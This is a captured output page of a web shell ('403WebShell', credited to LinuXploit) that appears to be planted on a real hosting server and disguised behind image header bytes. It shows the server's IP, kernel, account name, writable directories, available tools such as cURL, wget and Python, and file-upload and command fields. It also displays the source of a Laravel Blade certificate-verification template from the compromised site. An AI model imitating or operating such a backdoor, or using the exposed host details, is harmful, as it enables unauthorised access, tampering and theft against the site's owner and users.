����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 3.148.170.88
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/././bofirmacademy.com/resources/views/frontend/partials/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/././bofirmacademy.com/resources/views/frontend/partials/certificate_view.blade.php
<div class="row align-items-center">
    <div class="col-md-12">
        @if (!is_null($certificate))
            <div class="thankyou-box text-center bg-white px-5 mt-5">
                <img src="{{ asset('frontend/assets/img/thank-you-img.png') }}" alt="img" class="img-fluid">
                <h6 class="mt-5">{{ __('This certificate is valid') }}</h6>
            </div>
        @else
            <div class="thankyou-box text-center bg-white px-5 mt-5">
                <img src="{{ asset('frontend/assets/img/certificate-verify-faield.png') }}" alt="img"
                    class="img-fluid">
                <h6 class="mt-5">{{ __('The Certificate is invalid with the following information') }}</h6>
            </div>
        @endif

    </div>
</div>
@if (!is_null($certificate))
    <div class="row align-items-center justify-content-center mt-5">
        <div class="col-md-12">
            <div class="certificate-result-box pt-5">
                <div class="certificate-result-inner-box mx-auto">
                    
                    <div class="">
                        @php 
                        $ext = pathinfo(public_path($certificate->path), PATHINFO_EXTENSION);
                        @endphp
                        @if($ext == 'pdf')
                        <embed src="{{ asset($certificate->path) }}#toolbar=0&navpanes=0&scrollbar=0" width="100%" height="450px" />
                        @else
                        <img class="img-fluid" src="{{ asset($certificate->path) }}" alt="{{ $certificate->path }}">
                        @endif
                    </div>
                    <div class="certificate-verify-result-left mt-3">
                        <div class="table-responsive">
                            <table class="table">
                                <tbody>
                                    <tr>
                                        <th>{{ __('Course') }}:</th>
                                        <td>{{ $certificate->course->title }}</td>
                                    </tr>
                                    <tr>
                                        <th>{{ __('Student') }}:</th>
                                        <td>{{ $certificate->student->name }}</td>
                                    </tr>
                                    <tr>
                                        <th>{{ __('Certificate Number') }}:</th>
                                        <td>{{ $certificate->certificate_number }}</td>
                                    </tr>
                                    <tr>
                                        <th>{{ __('Asign Date') }}:</th>
                                        <td>{{ date('Y-m-d', strtotime($certificate->created_at)) }}</td>
                                    </tr>
                                </tbody>
                            </table>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
@endif

Youez - 2016 - github.com/yon3zu
LinuXploit